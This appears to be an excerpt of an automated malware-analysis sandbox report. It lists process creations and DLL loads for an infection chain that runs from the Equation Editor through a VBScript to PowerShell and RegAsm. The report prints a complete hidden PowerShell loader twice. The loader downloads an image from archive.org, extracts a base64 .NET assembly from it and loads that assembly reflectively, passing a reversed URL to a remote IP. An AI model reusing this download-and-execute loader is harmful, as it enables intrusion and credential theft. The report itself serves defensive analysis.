                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
